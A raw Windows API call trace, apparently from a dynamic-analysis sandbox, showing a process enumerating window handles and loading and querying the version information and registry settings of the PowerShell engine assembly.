[0072.061] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
[0072.062] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x920
[0072.062] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x910
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x900
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8f0
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8e0
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8d0
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8c0
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8b0
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8a0
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x890
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x880
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x870
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x858
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x844
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x834
[0072.062] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x824
[0072.062] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x814
[0072.063] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x804
[0072.063] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xc8
[0072.063] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x2c8
[0072.063] GetWindowThreadProcessId (in: hWnd=0x50152, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x134
[0072.063] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x5dc
[0072.063] GetWindowThreadProcessId (in: hWnd=0x3014c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x404
[0072.063] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x42c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x330
[0072.063] GetWindowThreadProcessId (in: hWnd=0x20136, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x42c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x330
[0072.063] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x42c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x404
[0072.063] GetWindowThreadProcessId (in: hWnd=0x200d2, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x404
[0072.063] GetWindowThreadProcessId (in: hWnd=0x200c2, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.063] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x4009e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x624
[0072.064] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x63c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x20110, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x69c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x650
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x684
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.064] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x61c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x50090, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x5d8
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.064] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.065] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.065] GetWindowThreadProcessId (in: hWnd=0x30040, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x504
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x524
[0072.065] GetWindowThreadProcessId (in: hWnd=0x100a6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x5ec
[0072.065] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x424
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.065] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xa10
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x980
[0072.065] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x978
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x628
[0072.065] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x628
[0072.065] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbcc
[0072.065] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbcc
[0072.065] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbc4
[0072.065] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbc4
[0072.066] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
[0072.066] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
[0072.066] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x920
[0072.066] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x910
[0072.066] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x900
[0072.066] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8f0
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8e0
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8d0
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8c0
[0072.066] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8b0
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x8a0
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x890
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x880
[0072.066] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x870
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x858
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x844
[0072.066] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x834
[0072.066] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x824
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x814
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x804
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xc8
[0072.067] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x2c8
[0072.067] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x134
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x5dc
[0072.067] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x330
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x42c
[0072.067] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x404
[0072.067] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x624
[0072.067] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x63c
[0072.067] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x69c
[0072.067] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x650
[0072.067] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.067] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x504
[0072.067] GetWindowThreadProcessId (in: hWnd=0x100a8, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x5ec
[0072.110] WerSetFlags () returned 0x0
[0072.153] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
[0072.154] CoTaskMemFree (pv=0x0)
[0072.154] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dcc0 | out: pulNumLanguages=0x16dcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dcc0) returned 1
[0072.154] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dcc8, pwszLanguagesBuffer=0x2d4fee8, pcchLanguagesBuffer=0x16dcc0 | out: pulNumLanguages=0x16dcc8, pwszLanguagesBuffer=0x2d4fee8, pcchLanguagesBuffer=0x16dcc0) returned 1
[0072.157] CoTaskMemAlloc (cb=0x24) returned 0x2f0350
[0072.157] GetUserDefaultLocaleName (in: lpLocaleName=0x2f0350, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
[0072.157] CoTaskMemFree (pv=0x2f0350)
[0072.219] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0072.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.219] CoTaskMemFree (pv=0x256340)
[0072.220] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0072.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.221] CoTaskMemFree (pv=0x256340)
[0072.243] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0072.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.243] CoTaskMemFree (pv=0x256340)
[0072.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.248] SetErrorMode (uMode=0x1) returned 0x1
[0072.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16d940 | out: lpFileInformation=0x16d940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
[0072.249] SetErrorMode (uMode=0x1) returned 0x1
[0072.249] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dbb0 | out: lpdwHandle=0x16dbb0) returned 0x94c
[0072.249] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d53778 | out: lpData=0x2d53778) returned 1
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16db28, puLen=0x16db20 | out: lplpBuffer=0x16db28*=0x2d53814, puLen=0x16db20) returned 1
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d538f0, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="Microsoft Corporation") returned 21
[0072.250] CoTaskMemAlloc (cb=0x2e) returned 0x2f3990
[0072.250] lstrcpyW (in: lpString1=0x2f3990, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
[0072.250] CoTaskMemFree (pv=0x2f3990)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d53944, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="System.Management.Automation") returned 28
[0072.250] CoTaskMemAlloc (cb=0x3c) returned 0x2f4c80
[0072.250] lstrcpyW (in: lpString1=0x2f4c80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
[0072.250] CoTaskMemFree (pv=0x2f4c80)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d539a0, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="6.1.7601.17514") returned 14
[0072.250] CoTaskMemAlloc (cb=0x20) returned 0x2fa2a0
[0072.250] lstrcpyW (in: lpString1=0x2fa2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0072.250] CoTaskMemFree (pv=0x2fa2a0)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d539e0, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0072.250] CoTaskMemAlloc (cb=0x44) returned 0x2f4c80
[0072.250] lstrcpyW (in: lpString1=0x2f4c80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0072.250] CoTaskMemFree (pv=0x2f4c80)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d53a48, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
[0072.250] CoTaskMemAlloc (cb=0x76) returned 0x28ce10
[0072.250] lstrcpyW (in: lpString1=0x28ce10, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
[0072.250] CoTaskMemFree (pv=0x28ce10)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d53ae4, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0072.250] CoTaskMemAlloc (cb=0x44) returned 0x2f4c80
[0072.250] lstrcpyW (in: lpString1=0x2f4c80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0072.250] CoTaskMemFree (pv=0x2f4c80)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d53b48, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
[0072.250] CoTaskMemAlloc (cb=0x58) returned 0x2e65c0
[0072.250] lstrcpyW (in: lpString1=0x2e65c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
[0072.250] CoTaskMemFree (pv=0x2e65c0)
[0072.250] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d53bc4, puLen=0x16da90) returned 1
[0072.250] lstrlenW (lpString="6.1.7601.17514") returned 14
[0072.251] CoTaskMemAlloc (cb=0x20) returned 0x2fa2a0
[0072.251] lstrcpyW (in: lpString1=0x2fa2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0072.251] CoTaskMemFree (pv=0x2fa2a0)
[0072.251] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x2d5386c, puLen=0x16da90) returned 1
[0072.251] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
[0072.251] CoTaskMemAlloc (cb=0x66) returned 0x2f8e40
[0072.251] lstrcpyW (in: lpString1=0x2f8e40, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
[0072.251] CoTaskMemFree (pv=0x2f8e40)
[0072.251] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x0, puLen=0x16da90) returned 0
[0072.251] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x0, puLen=0x16da90) returned 0
[0072.251] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16da98, puLen=0x16da90 | out: lplpBuffer=0x16da98*=0x0, puLen=0x16da90) returned 0
[0072.251] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16da68, puLen=0x16da60 | out: lplpBuffer=0x16da68*=0x2d53814, puLen=0x16da60) returned 1
[0072.251] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0072.251] VerLanguageNameW (in: wLang=0x0, szLang=0x2ba920, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
[0072.251] CoTaskMemFree (pv=0x2ba920)
[0072.251] VerQueryValueW (in: pBlock=0x2d53778, lpSubBlock="\\", lplpBuffer=0x16dab8, puLen=0x16dab0 | out: lplpBuffer=0x16dab8*=0x2d537a0, puLen=0x16dab0) returned 1
[0072.255] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0072.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.255] CoTaskMemFree (pv=0x256340)
[0072.318] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0072.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.318] CoTaskMemFree (pv=0x256340)
[0072.320] lstrlenW (lpString="䅁") returned 1
[0072.328] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d988 | out: phkResult=0x16d988*=0x308) returned 0x0
[0072.329] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d978 | out: phkResult=0x16d978*=0x30c) returned 0x0
[0072.329] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da08 | out: phkResult=0x16da08*=0x310) returned 0x0
[0072.331] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d94c, lpData=0x0, lpcbData=0x16d948*=0x0 | out: lpType=0x16d94c*=0x1, lpData=0x0, lpcbData=0x16d948*=0x56) returned 0x0
[0072.331] CoTaskMemAlloc (cb=0x5a) returned 0x2f8dd0
[0072.331] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d91c, lpData=0x2f8dd0, lpcbData=0x16d918*=0x56 | out: lpType=0x16d91c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d918*=0x56) returned 0x0
[0072.332] CoTaskMemFree (pv=0x2f8dd0)
[0072.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
